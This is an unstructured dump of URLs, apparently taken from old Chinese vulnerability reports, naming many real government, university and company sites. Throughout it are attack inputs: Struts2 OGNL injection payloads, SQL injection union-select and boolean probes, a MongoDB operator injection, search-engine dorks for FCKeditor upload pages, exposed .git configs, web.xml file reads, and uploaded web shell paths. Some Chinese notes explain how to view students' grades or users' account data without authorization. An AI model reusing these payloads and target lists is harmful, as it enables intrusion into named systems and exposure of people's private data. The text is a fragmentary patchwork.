http://www.tctjj.gov.cn/Article_Print.asp?ArticleID=20 
http://60.190.204.108/portal/catalogtemplate/1/index.jsp?catalog_id=20061127000012 http://www.jnyy.gov.cn/Article_Print.asp?ArticleID=71 http://tianjinrd.sinosteel.com/gzdts.asp?id=277 http://tianjinrd.sinosteel.com/Manage/Admin/Login.asp http://tianjinrd.sinosteel.com/ http://club.xywy.com/comeback_fromurl.php?qon=47485053&qid=56537950 http://localhost/upload/mobile/index.php http://www.dj100.cn/CogWeb/main/main.action http://www.zzxfj.gov.cn/main.asp?menu_id=65 http://220.178.49.194/Login.aspx http://www.f747.com/eflyguanli/gongzuo/xiangxi.asp?id=5382 https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorDetail.aspx?ShangID=ES0000000079 http://www.hneeb.cn/website/newsdoc/jyrd/cjfxxt.htm http://gkzypg.hneeb.cn/cscj/MainFrame.aspx中的cscj更改成cj其余不变。然后就以师大附中的名义登陆了~可以查询最近几年的所有人的各科成绩。 http://www.smxxf.gov.cn/lanmu.asp?lm_id=51 http://www.hnxcxf.gov.cn/news/news_more.asp?lm2=158 http://www.petropub.com:8085/ https://e.boc.cn/ehome/SQISOFT/web/webNew/nLifeKnowlege_detail.aspx?sta=canpass&csId=CS0000000008 https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguan_service_detail.aspx?wuguanServeId=PT0000000019 https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorMessageList.aspx?ESA_SHOPID=ES0000000080 http://wooyun.org/bugs/wooyun-2010-077623 http://wooyun.org/bugs/wooyun-2014-080019 http://www.phoenixcne.de/video_news_list.php?category=special http://www.lxzjc.gov.cn/jubao/admin/FCKeditor/editor/filemanager/connectors/test.html# http://www.ysland.gov.cn/xinfang/admin/FCKeditor/editor/filemanager/connectors/test.html ip:222.73.242.41 http://123.125.203.140/seeyon/main.do system:system用户,导致邮箱配置信息泄露,由于邮箱配置为邮箱管理员导致该公司整个邮件系统的沦陷。 http://210.29.17.68/WFManager/loginAction_getCheckCodeImg.action http://wan.8264.com/xianlu-320 http://wan.8264.com/使用ecmll http://gx.189.cn/%c0%ae/WEB-INF/web.xml http://ts.mskjj.gov.cn/admin/FCKeditor/editor/filemanager/connectors/test.html# http://www.dzmzj.gov.cn/jzxx//admin/FCKeditor/editor/filemanager/connectors/test.html# 
https://e.boc.cn/ehome/SQISOFT/web/webNew/nTopicDetail.aspx?endId=46db2fb9-1bac-45ab-a153-62092fa9e556 https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguan_news_detail.aspx?newsId=PN0000000001 https://e.boc.cn/ehome/SQISOFT/web/webNew/nSellorActivityList.aspx?ShangID=ES0000000096 http://www.jsgjj.cn/gjj/personal/login.action http://www.skyexam.com/MemberQualificationManage/StudentModify.aspx?PK=121115000007043 http://www.fjdz.org.cn:81/RuleList.asp?ColID=2 http://xf.jlthjy.com/rulelist.asp?cid=1 http://www.sdjs.gov.cn/jcms/m_5_7/replace/opr_importinfo.jsp?fn_billstatus=1 http://218.77.183.6/website/lookJsjUser.do?id=45670 http://kzone.kuwo.cn/mlog/ www.kuwo.cn http://www.kuwo.cn http://59.41.66.188/OAapp/WebObjects/OAapp.woa http://cfa.gzhu.edu.cn/index.php?c=info&a=index&id=335&cid=76 http://cfa.gzhu.edu.cn/index.php?c=info&a=index&id=335'&cid=76 http://www.510bx.com/Insurance/InsuranceOrderQuery.aspx?DeptID=228147 http://mail.fuck.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse= http://www.njztb.cn/complaint/rulelist.asp?cid=2 http://kjc.njupt.edu.cn/admin/loginAdminUser.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D bbs.shouji.baofeng.com/uc_server http://i0.letvimg.com/phone/201208/17/201208171335166961.png live_url:http://live.gslb.letv.com/gslb?stream_id=zhejiang&tag=live&ext=m3u8&sign=live_phone http://live.shouji.baofeng.com/live/channel_detail/?channel_id=16&os_version=ipad&bf_version=3.6.5 http://mxt.be.xiaomi.com/mxt/static/ http://hmxx.yooknet.com/reg/action/index.php https://zfgjj.hanzhong.gov.cn https://xncb.gov.cn 
https://mdjsp.gov.cn ip:61.129.42.76 http://www.ecerb.gov.cn/upload/ http://tg.gmw.cn/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=2%20union%20%20%20select%201,2,3,4,5,user%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23 http://www.epicc.com.cn/eproperty/displayInfo/showOrderDetail.do?orderId=85da35b49bc1xxxxxxede294e970 http://www.epicc.com.cn/eproperty/displayInfo/showOrderDetail.do?orderId=输入订单号直接访问 http://gytc.whut.edu.cn/login/Jeecms.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://overseas.5i5j.com/houses site:gov.cn inurl:visitseacrch.asp site:gov.cn inurl:rulelist.asp http://www.lxzjc.gov.cn/jubao/admin/FCKeditor/editor/filemanager/connectors/test.html# http://www.qyx.gov.cn/wsxinfang//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.yiliang.gov.cn/xf//admin/FCKeditor/editor/filemanager/connectors/test.html# http://www.sidui.gov.cn/xinfang1//admin/FCKeditor/editor/filemanager/connectors/test.html# http://www.ymlz.gov.cn:808//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.yjxzzb.gov.cn//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.gswx.gov.cn/xinfang//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.dxmzj.gov.cn/jzxx//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.flqzgzw.gov.cn/xf//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.jxqgb.gov.cn/wangshangxinfang//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.xjgl.gov.cn/xzxx//admin/FCKeditor/editor/filemanager/connectors/test.html 
http://www.qjetc.gov.cn:88/sfwt//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.sanhu.gov.cn/xinxiang//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.jsjhcz.gov.cn/czyx//admin/FCKeditor/editor/filemanager/connectors/test.html http://www.wuxixs.jcy.gov.cn/jvbao//admin/FCKeditor/editor/filemanager/connectors/test.html http://kf.yyugame.com/ http://cometd.coolyun.com/cometd/index.do http://developer.coolyun.com/index.php http://218.91.214.253/webgps/ http://app1.chinadaily.com.cn/survey/v.php?mmid=841 http://energy.chinadaily.com.cn/ http://energy.chinadaily.com.cn/bbs/uc_server/control/admin/db.php http://energy.chinadaily.com.cn/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ inurl:/oa/KeySearch.aspx?type= http://admin.96020228.cn/ http://admin.96020228.cn/DeovoOpration_edit.asp?rowid=1 http://admin.96020228.cn/DeovoOpration_do.asp?action=modify&chat_no=1 http://blog.kf5.com/wp-login.php http://system.greentree.com.cn:8080/frontinvest/managerLoad.aspx http://system.greentree.com.cn:8080/frontinvest/NewsList.aspx?newskind=2 http://system.greentree.com.cn:8080/op/Module_ERP/home.htm http://system.greentree.com.cn:8080/op/module_erp/menu.aspx http://system.greentree.com.cn:8080/op/module_erp/market/Search.aspx http://gb.immomo.com/.git/config ftp://121.201.16.205/ http://125.93.53.5:8081/admin http://www.dhsfda.com/home/newsone.php?action=look&classid=11&id=502 http://www.dhsfda.com/home/newsone.php?action=look&classid=11&id=502%20and%201=1 http://www.dhsfda.com/home/newsone.php?action=look&classid=11&id=502%20and%201=11 www.shendong.com.cn http://vckb.l247.bizcn.com/www/newsOne.php?id=282 http://vckb.l247.bizcn.com/www/newsOne.php?id=282 http://campaign.51fund.com/bak.jsp http://moffice.wo.com.cn/news_show.php?MenuID=4&NewsID=144 http://www.e2go.com.cn/ 
www.e2go.com.cn)是基于长途客运联网售票系统建立的面向长途旅客的专业性门户网站。发售全北京各个长途汽车站点的网络售票服务。 http://wm.crsg.com.cn/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp http://www.hnswht.gov.cn//cms/voteManager/seeresult_bz.jsp?titleid=2&opid=1 http://web2.gdupt.edu.cn/jiangong/admin.php/Public/login http://bknzsw.swu.edu.cn/v/denglu.sql http://www.hntsw.gov.cn/comment_info.jsp?sslm=00202&xxbh=4609 http://211.142.26.14/comment_info.jsp?sslm=00204&xxbh=2849 http://app.xjzj.gov.cn:8080/comment_info.jsp?sslm=00202&xxbh=16801 http://124.238.116.11:81/comment_info.jsp?sslm=00201&xxbh=6201 http://www.2yuanyy.com/SearchList.aspx?key=423'&class=1 http://pay.111.com.cn/payment/common/tradeNotify.action http://erp.998.com/webportal_electroniccommerce/RoomUsableReport.aspx http://www.111.com.cn/ http://buy.111.com.cn/interfaces/order/orderSure.action http://sms.9air.com/user!loginNoName.action http://i.yixin.com/ http://www.tsrb.com.cn:7001/login.action http://cms40.legaldaily.com.cn:7001/enpadmin/login.jsp http://www.hnic.com.cn:7001/enpadmin/login.jsp http://sys.zqsb.com.cn:7001/enpadmin/login.jsp http://jjc.hbsjtt.gov.cn:81/enpadmin/login.jsp http://210.72.21.12:8008/enpadmin/login.jsp www.china.com.cn http://jjc.hbsjtt.gov.cn:81/enpadmin/login.jsp http://61.153.35.46:7001/enpadmin/login.jsp http://www.jhnews.com.cn http://210.192.127.111:8991/enpadmin/login.jsp http://221.231.99.235:7001/enpadmin/login.jsp http://125.93.53.9/account/buyer/orderDetail.html?order_id=3631030 https://www.lashoupay.com/newjiesuan/login/submit.do http://test.lashoupay.com/lashoupay/lashoupay/login.action http://zqb.creditease.cn/pages/User/personalCenter.do?email=1@qq.com&emailFlag=fromemail&option=binding http://**.**.**/scripts/ http://**.**.** http://125.93.53.9/account/buyer/orderDetail.html?order_id=3631030。 http://218.205.171.101:8080/ http://dc.piccnet.com.cn/selfbind/stb/home.action?bName=dc http://www.ejiayu.com/wwwroot.rar inurl:GroupSpace?groupId= 
http://www.ycyz.com.cn/bl/GroupSpace?groupId=group831000000001 http://zjyiz.zje.net.cn/bl/GroupSpace?groupId=group43000000044 http://www2.weiyu.sh.cn/bl35/GroupSpace?groupId=group56000000016 http://www.hszhj.pudong-edu.sh.cn/bl/GroupSpace?groupId=group39000000003 http://casz.dgjy.net/bl/GroupSpace?groupId=group16000000003 http://www.hshsh.pudong-edu.sh.cn/bl/GroupSpace?groupId=group301000000001 http://www.sms8090.com/superadmin/index.action http://114.242.194.165:8080/ec-web:哈弗商城 http://www.mysql.com/downloads/api-jdbc-stable.html jdbc:mysql://192.168.1.3:3306/dbjddb?useUnicode=true&characterEncoding=utf8 jdbc:mysql://localhost:3306/dbjddb?useUnicode=true&characterEncoding=utf8 http://42.121.113.227/index.html http://steward.shanghai-air.com/1.txt inurl:NTRdrLogin.aspx http://124.133.52.135/ModifyPassWord.aspx http://opac.jxlib.gov.cn/ModifyPassWord.aspx http://opac.its.csu.edu.cn/ModifyPassWord.aspx http://ilas.pxlib.cn/ModifyPassWord.aspx http://218.28.6.78/ModifyPassWord.aspx http://218.195.101.103/ModifyPassWord.aspx http://ilas.ynlib.cn/ModifyPassWord.aspx http://opac.whsw.cn/ModifyPassWord.aspx http://218.195.112.99/ModifyPassWord.aspx http://202.96.165.98/ModifyPassWord.aspx http://124.133.52.135/ModifyPassWord.aspx http://210.34.212.78/ModifyPassWord.aspx http://my.zslib.cn/ModifyPassWord.aspx http://211.69.140.40/ModifyPassWord.aspx http://218.64.118.42:88/ModifyPassWord.aspx http://182.135.65.151:9999/ModifyPassWord.aspx http://182.135.65.151:9999/ModifyPassWord.aspx http://182.135.65.151:9999 http://mob.17173.com/search.php post:keys=1&Tclass=1&searchclass=News_title&Submit=%CB%D1+%CB%F7&page= http://sms.tootoo.cn/login.action http://www.966009.com/ http://www.966009.com/client/newsshow/jiaofeiwangdian.aspx?city=1 http://eshop.shenzhenair.com/index.action http://huistory.com/index.php?m=base&c=login&a=index http://e.sxhm.com/admin/pcfinal_login.asp http://www.honghonghu.com/account/reset-password/180 http://211.151.13.149:8080/zabbix/index.php 
http://erp.suning.com.cn http://erp.suning.com.cn/hrss/login.jsp的忘记密码处 http://erp.suning.com.cn/hrss/ResetPwd.jsp http://nsp.lashou.com/ ttp://nsp.lashou.com/Home/Data/refund_list?goods_id=&start_time=2014-12-07&end_time=2014-12-07 http://job.renren-inc.com/info.php www.56.com www.yhd.com http://www.hsfdc.com/web/Pubinfo/xmdljgxx_Detail.asp?jgbh=22 http://www.essfdc.gov.cn/pubinfo/xmdljgxx_Detail.asp?jgbh=13 http://www.ltxfdc.com/pubinfo/xmdljgxx_Detail.asp?jgbh=3 http://www.dyfdc.net.cn/pubinfo/xmdljgxx_Detail.asp?jgbh=29 http://www.tmfdc.gov.cn/pubinfo/xmdljgxx_Detail.asp?jgbh=15 www.vgoldpay.com http://haha.baozou.com/manhua/18.html http://haha.baozou.com/manhua/18.html http://haha.baozou.com/plus/showpl.php?id=18&classid=1&type=16&up=0 http://ffyj.bgpintl.com/Web/ShowShared.aspx?m=research&type=Research&strID=31 http://1626.dooland.com/float_check_cart.php http://baozouribao.com/articles/4977423?from=web_right# http://baozouribao.com/articles/4977423?from=web_right# http://b.ltyg.cn/BManage/SSO/DoLogin.aspx?check=1 http://b.ltyg.cn/EcManage/request/ShowLeaveword.aspx?ids=1 http://bj.cltt.org/Web/ http://crm98.cn/UsersAction_getLog.action http://www.zte-e.com/ http://www.zte-e.com/cn/Search.aspx?Keyword= http://www.zte-e.com/manage/AdminLogin.aspx http://Mail.mailer.com.cn/JDWA/cgi/user_verify_agree.cgi?checkbox=mailer.com.cn+test123 http://oa.dodopal.com http://enquiry.dodopal.com:9997/fapaym/login.action http://vdian.vip.58.com/user/bizcard/10901511882246/35828?all=1 http://thgs.shenhuagroup.com.cn/uploads/ http://thgs.shenhuagroup.com.cn/includes/ http://thgs.shenhuagroup.com.cn/uploads/user/user_info.xls http://211.151.14.143 https://excashier.alipay.com/standard/trade20001/templateFlow.htm?orderId=c4a86d9a8xx00ea2&action=init#orderList http://oatest.tpyzq.com/yzmdy.php http://db.826sz.com/webccb/toupiao.aspx, www.sogosz.com www.826sz.com http://www.quamir.com/quamir/moreMarketNews.action http://www.snrlzy.com/logoinformation.aspx?comun=xzsds 
http://www.snrlzy.com/logoinformation.aspx?comun=xzsds http://www.xnfcj.com/pubinfo/StatData.asp http://www.szfcsc.com/web/PubInfo/StatData.asp?fwlx=%C9%CC%D2%B5%C3%C5%B5%EA&QryOfYear=%C6%E4%CB%FB http://www.hsfdc.com/web/PubInfo/StatData.asp?fwlx=%C6%E4%CB%FB&QryOfYear=%C9%CC%C6%B7%B7%BF http://www.jsxfgj.com/PubInfo/StatData.asp?fwlx=%C9%CC%C6%B7%B7%BF&QryOfYear=%C9%CC%C6%B7%B7%BF http://www.essfdc.gov.cn/PubInfo/StatData.asp?QryToday=%C9%CC%D2%B5%D3%C3%B7%BF&fwlx=%C9%CC%D2%B5%D3%C3%B7%BF&QryOfYear=%C9%CC%C6%B7%B7%BF http://www.ltxfdc.com/pubinfo/StatData.asp?fwlx=%C9%CC%C6%B7%B7%BF&QryOfYear=%C9%CC%C6%B7%B7%BF http://www.bsfcj.com/PubInfo/StatData.asp?QryTM=%C9%CC%C6%B7%B7%BF&fwlx=%C9%CC%C6%B7%B7%BF&QryOfYear=%D7%A1%D5%AC http://www.tfxfdc.com/pubinfo/StatData.asp?fwlx=%C6%E4%CB%FB&QryOfYear=%C9%CC%D2%B5 http://www.dyfdc.net.cn/pubinfo/StatData.asp?QryToday=%D7%A1%D5%AC&fwlx=%B0%EC%B9%AB%C2%A5&QryOfYear=%B0%EC%B9%AB%C2%A5 http://www.haxfdc.com/web/PubInfo/StatData.asp?fwlx=%C9%CC%C6%B7%B7%BF&QryOfYear=%C9%CC%C6%B7%B7%BF http://zone.wooyun.org/content/17131 http://zjjs.zjut.edu.cn/news_show.php?ShowId=20816 http://bucee.net/ http://thgs.shenhuagroup.com.cn/ http://www.taixin.cn/ http://www.taixin.cn/Saber_Manage/ http://211.151.36.37/ http://pawn.mofcom.gov.cn/pawn_monitor/login2.do?password=202CB962AC59075B964B07152D234B70&logname=53a49a51a48a56a65a49a48a48a49a50&type=client&corpId=73632&funcMethod=monthreport inurl:SrcNotice.jsp?businessid= http://www.lnxzfw.gov.cn/ViewSource/SrcNotice.jsp?businessid=8b81cf2b37d58e012b382e76240105 http://117.40.128.59:1100/outportal/ViewSource/SrcNotice.jsp?businessid=818ab52a924beb012a93d943660354 http://117.40.186.185:8008/outportal/ViewSource/SrcNotice.jsp?businessid=8080812a9e1b06012aa188f6540079 http://xzfw.ncqsh.gov.cn/ViewSource/SrcNotice.jsp?businessid=2880e92a98ce5e012a990c912300c1 http://xzsp.jxgc.gov.cn/outportal/ViewSource/SrcNotice.jsp?businessid=8b81d22b3f0bde012b41d8a7350361 
http://222.133.32.11:31188/ecgapout/ViewSource/SrcNotice.jsp?businessid=80808137cb7a280137d036a14513d9 http://www.lnxzfw.gov.cn/ViewSource/SrcNotice.jsp?businessid=8b81cf2b37d58e012b38449a0c0181 http://117.40.239.74/outportal/ViewSource/SrcNotice.jsp?businessid=beed753a905fa6013a906862f804d3 http://www.wooyun.org/bugs/wooyun-2014-085328/trace/bea267ff11e5f5bdd26e3fd293266ce7 http://kingchannels.cn/softwarer/member/userlogin.asp http://www.wooyun.org/bugs/wooyun-2014-086050/trace/76d05edef536040799165ac0b25c75ff http://hitee.hit.edu.cn:8080/JspSpyJDK5.jsp inurl:/list.jsp http://www.ldlyy.com/search.jsp?strsearch=1 http://www.gsjkjy.org.cn/search.jsp?strsearch=1 http://www.gsblood.com/search.jsp?strsearch=1 http://www.jcsxz.com/search.jsp?strsearch=1 http://www.qyszxxz.com/search.jsp?strsearch=1 inurl:Article_Print.asp?ArticleID= http://lixue.henau.edu.cn/Article_Print.asp?ArticleID=674 http://lixue.henau.edu.cn/Article_Print.asp?ArticleID=674 http://dep.yctc.edu.cn/chinese/wlkc/gggxx/Article_Print.asp?ArticleID=32 http://dept.wyu.edu.cn/wlsyzx/Article_Print.asp?ArticleID=1084 http://jpkc.njau.edu.cn/sketch/Article_Print.asp?ArticleID=969 http://db1.hut.edu.cn/Article_Print.asp?ArticleID=2004 http://www.cls.hznu.edu.cn/hjhx/Article_Print.asp?ArticleID=573 http://www2.ouc.edu.cn/sbc/Article_Print.asp?ArticleID=261 http://tw.gzhu.edu.cn/Article_Print.asp?ArticleID=2392 http://xsc.hnfnu.edu.cn/Article_Print.asp?ArticleID=188 http://country.whpu.edu.cn/Article_Print.asp?ArticleID=725 http://caiwu.bigc.edu.cn/Article_Print.asp?ArticleID=247 http://www.gdfda.org/index.php/Index/note/id/156 http://www.gdfda.org/index.php/Index/note?id=156 http://www.gdfda.org/index.php/Index/note?id=156 http://www.gdfda.org/index.php/Index/note?id=156 http://www.gdfda.org/index.php/Index/note?id=156 http://sdgs.shenhuagroup.com.cn/web.rar http://www.runoqd.com/ http://58.58.34.98:8090/ClientQuery/ClientInfo.aspx 
http://www.10050.net,选择河北省,在网站横幅菜单中选择网上营业厅-宽带自助,输入获取到的宽带账号和密码,查询上个月(除当月以外的月份),便可获取到用户的信息。 http://www.tzqf.gov.cn/adm/Login.html http://space.fang.com/21191911/index/ http://space.fang.com/?c=relation&a=addfollow&userid=21191911 http://www.baidu.com/index?username[$ne]=x http://drops.wooyun.org/tips/3939 http://docs.mongodb.org/manual/reference/operator/query/ http://map.qq.com/ http://map.qq.com/?l=228692835 http://youxue.juren.com/plus/article_image.php?aid=1628 http://www.auxgroup.com/FWNewsList.aspx?NodeCode=00040001 www.0755tt.com http://opengame.baidu.com/index.php?r=InternalMessageAction&m=view&id=xxx%20and%201=2%20union%20select%201,2,@@version,4,5%20from%20information_schema.tables%23&type=2 http://opengame.baidu.com/index.php?r=InternalMessageAction&m=delete-one&type=2&ids=xxx http://221.5.243.11:9090/%E6%9C%8D%E5%8A%A1%E5%99%A8/jboss-4.0.5.GA/server/default/deploy/jmx-console.war/WEB-INF/classes/org/jboss/jmx/ http://221.5.243.13:8088/neon_admin/admin/login.do# http://www.bzjjjc.gov.cn/summaryarticle.php?MsgId=71511 http://www.10010999.com/cms/login.jsp http://www.10010999.com/cms/login.jsp www.10010999.com http://www.ysland.gov.cn/xinfang/ruleshow.asp?id=12 https://webmail.ecnu.edu.cn/ http://shx.hit.edu.cn http://shx.hit.edu.cn/jsp/web/index/webDownload.do?inputPath=/WEB-INF/web.xml&filename=wooyun.txt www.xxx.com/do.php?act=user_cart_del www.xxx.com/do.php?act=user_shopfavorite_del http://webchat.ruijie.com.cn/live800/chatClient/chatbox.jsp?companyID=8933&configID=7&skillId=1&enterurl=http://webchat.ruijie.com.cn http://my.buu.edu.cn/ http://survey.game.renren.com/index.php?sid=28299 http://e.qq.com/ec/api.php?mod=report&act=adgroup&g_tk=991968923&d_p=0.36786074754056486&datetype=1&format=json&page=1&pagesize=20&sdate=2014-12-09&edate=2014-12-09&status=&fastdate=custom&searchtype=&searchname=&reportonly=0&product_type=&product_id=&campaignid=256945&callback=_Callback&owner=****** http://win.zteup.com,一个购物的网站,存在上传漏洞,可以getshell 
http://win.zteup.com:8080/main/upload/20141209142407291292039.jsp codehttp://219.142.40.227/Logon.aspx http://219.142.40.227 http://www.hcasc.gov.cn/Download.asp?n=Download.asp http://113.106.164.25 http://mail.zsks.gov.cn/webmail/getPass.php?email=aaa@zsks.gov.cn&update=s inurl:gb/company.asp http://www.bolin.com.hk//Utility/UploadFile/FileList.asp http://www.hengtongdz.com//Utility/UploadFile/FileList.asp http://www.kenengdq.com//Utility/UploadFile/FileList.asp http://www.huaxinsj.com//Utility/UploadFile/FileList.asp http://www.tslingerie.com//Utility/UploadFile/FileList.asp http://www.zhuoqishanzhuang.com//Utility/UploadFile/FileList.asp http://www.dkg.com.cn//Utility/UploadFile/FileList.asp http://www.zsmeierjia.com//Utility/UploadFile/FileList.asp http://www.dgsanyo.com//Utility/UploadFile/FileList.asp http://www.jinludalight.com//Utility/UploadFile/FileList.asp http://www.dg-hy.com.cn//Utility/UploadFile/FileList.asp http://www.yhtec.com.cn//Utility/UploadFile/FileList.asp http://www.fuhuacarpet.com//Utility/UploadFile/FileList.asp http://www.lmfdz.com//Utility/UploadFile/FileList.asp http://www.alan-aic.com//Utility/UploadFile/FileList.asp xx.dooland.com/float_check_cart.php autofan.dooland.com/float_check_cart.php bhstory.dooland.com/float_check_cart.php bjsqb.dooland.com/float_check_cart.php bjsqb.dooland.com/float_check_cart.php bjsqb.dooland.com/float_check_cart.php bjsqb.dooland.com/float_check_cart.php bjsqb.dooland.com/float_check_cart.php bjsqb.dooland.com/float_check_cart.php bjzb.dooland.com/float_check_cart.php bkzs.dooland.com/float_check_cart.php blogweekly.dooland.com/float_check_cart.php bqzs.dooland.com/float_check_cart.php bxzj.dooland.com/float_check_cart.php caifutang.dooland.com/float_check_cart.php caijing.dooland.com/float_check_cart.php caijingtianxia.dooland.com/float_check_cart.php caikuaixinbao.dooland.com/float_check_cart.php cbrand.dooland.com/float_check_cart.php cbzz.dooland.com/float_check_cart.php 
ccmm.dooland.com/float_check_cart.php ceocio.dooland.com/float_check_cart.php ceoun.dooland.com/float_check_cart.php cgoldjewelry.dooland.com/float_check_cart.php chaonanzhi.dooland.com/float_check_cart.php charm.dooland.com/float_check_cart.php chewang.dooland.com/float_check_cart.php chinaapparel.dooland.com/float_check_cart.php chinatoday.dooland.com/float_check_cart.php chinattw.dooland.com/float_check_cart.php chinaxiaokang.dooland.com/float_check_cart.php chip.dooland.com/float_check_cart.php ciweekly.dooland.com/float_check_cart.php cnemag.dooland.com/float_check_cart.php cniti.dooland.com/float_check_cart.php COCO.dooland.com/float_check_cart.php comicfans.dooland.com/float_check_cart.php comicshow.dooland.com/float_check_cart.php comicworld.dooland.com/float_check_cart.php corp.dooland.com/float_check_cart.php cpcfan.dooland.com/float_check_cart.php cpcw.dooland.com/float_check_cart.php cwsj.dooland.com/float_check_cart.php cyb.dooland.com/float_check_cart.php cyj.dooland.com/float_check_cart.php daxuesheng.dooland.com/float_check_cart.php dazhongDV.dooland.com/float_check_cart.php dazhongsheying.dooland.com/float_check_cart.php ddsj.dooland.com/float_check_cart.php djnsc.dooland.com/float_check_cart.php djnzj.dooland.com/float_check_cart.php dmcy.dooland.com/float_check_cart.php dnahz.dooland.com/float_check_cart.php dutianxia.dooland.com/float_check_cart.php dzlcgw.dooland.com/float_check_cart.php dzqc.dooland.com/float_check_cart.php dztzzn.dooland.com/float_check_cart.php dzyc.dooland.com/float_check_cart.php ebusinessreview.dooland.com/float_check_cart.php enterainment.dooland.com/float_check_cart.php fc.dooland.com/float_check_cart.php ffs.dooland.com/float_check_cart.php fh.dooland.com/float_check_cart.php foto-video.dooland.com/float_check_cart.php fsz.dooland.com/float_check_cart.php fxjj.dooland.com/float_check_cart.php FZDMAG.dooland.com/float_check_cart.php fzfzzk.dooland.com/float_check_cart.php ganla.dooland.com/float_check_cart.php 
gaoerfudujia.dooland.com/float_check_cart.php gjxqdb.dooland.com/float_check_cart.php gjzb.dooland.com/float_check_cart.php glmjpl.dooland.com/float_check_cart.php globalpeople.dooland.com/float_check_cart.php glxjsjb.dooland.com/float_check_cart.php artvalue.dooland.com/float_check_cart.php(所有涉及到SQL注入的页面都是这样的) http://zgzj.fjtelecom.com/shownews.aspx http://a.bdqn.cn/pb/pbmain/page/users/user_loginBefore.action http://i.bdqn.cn/getpassword?a=MTY1ODAwCU5OdTE1dAkxNDE4MTA2NzA0CWt0dHA6Ly9ob21lLmJkcW4uY24%3D http://home.bdqn.cn7 http://125.39.1.54/index.action http://www.xmnet8.com/ http://www.nfree.cn/ http://meepo.lzu.edu.cn/meepo/login!login.do http://www.ycxl.net/ http://oa.it.mobogarden.com/jira/browse/MWT-435?jql= http://117.78.0.247 http://yourname.duapp.com/bae.php,即可读取到 http://www.xyxzspfw.gov.cn/index_38.do http://www.xyxzspfw.gov.cn/index_38.do http://www.fxiaoke.com http://61.174.22.170/link/link.asp http://61.174.22.170/WebEditor/admin_login.asp http://61.174.22.170/webeditor/db/ewebeditor.mdb http://www.hxjnyy.com/gd/newsview.asp?anclassid=8&nclassid=37&nnclassid=0&bookid=2987%20and%201=1(正常) http://www.hxjnyy.com/gd/newsview.asp?anclassid=8&nclassid=37&nnclassid=0&bookid=2987%20and%201=2(错误) http://www.labi.com/feedback/userThreadFeedback?page=1&ir=1&parentId=12035 http://admin.gozap.com www.gozap.comjabber,成功登录总管理 http://x.x.x.x/webengine/data/online.txt http://**.**.**/download.casf=android http://218.197.80.9/login.html http://218.197.80.9 http://www.sdlgcj.net/sdlgcj/index.jsp http://www.hbpp.com.cn/about.php?typeid=7 http://202.116.160.99:8181/login/NoticeList.aspx?type=normal http://oa.52mf.cn/wui/theme/ecology7/page/login.jsp?templateId=1 http://jiuye.hebau.edu.cn/test.rar http://www.bjtel.cn/ http://www.bjtel.cn/shell.asp;.jpg http://www.bjtel.cn/admin/ http://www.bjtel.cn/kode/ http://www.fycj.gov.cn/admin/ http://www.chanpay.com/busi/tradingQueryManage.do?action=findPhoneQueryInfo&orderId=10000000000132030 http://223.252.196.25/ 
http://223.252.196.25/data.tar http://1.85.36.34/LoginFail.htm http://baozou.com/makers/1 http://www.xinhucaifu.com/news.php?id=156 http://223.202.19.96/.git/config http://ask.lenovo.com.cn/.git/config http://219.141.216.74/.git/config http://219.148.86.44/iden/ http://219.148.86.44/iden/loginUserController!login.action http://221.6.35.202/ http://221.6.35.202:8089/ http://me.ctrip.com/hotel/myCtrip/login.html https://openapi.ctrip.com/LogicSVR/AjaxServerNew.ashx http://localhost/uwa/index.php?g=member&c=archive&a=add_archive&archive_model_id=2 http://218.56.99.84:8003/webcwgkcun.aspx?deptid=3946 http://61.133.119.187:8091/webcwgkcun.aspx?deptid=155 http://222.135.76.147:8200/webcwgkcun.aspx?deptid=203 http://123.134.189.60:8022/webcwgkcun.aspx?deptid=4627 http://221.2.156.181:8800/webcwgkcun.aspx?deptid=162 http://222.135.109.70:8200/webcwgkcun.aspx?deptid=168 http://60.217.72.17:7129/webcwgkcun.aspx?deptid=3950 http://222.134.66.54:8014/webcwgkcun.aspx?deptid=3949 http://123.103.108.50/uc_server http://bbs.uctools.net/uc_server vroom.show.sina.com.cn/www/inc/SSOCookie.class.php uniqueid:userid:appgroup:displayname:gender:paysign client.show.sina.com.cn/www/inc/cookie.conf http://sfc.tanljgzx.gov.cn/SysManage/CunShow.aspx?id= http://222.135.109.70:8300/SysManage/CunShow.aspx?id= http://221.2.149.47:8300/SysManage/CunShow.aspx?id= 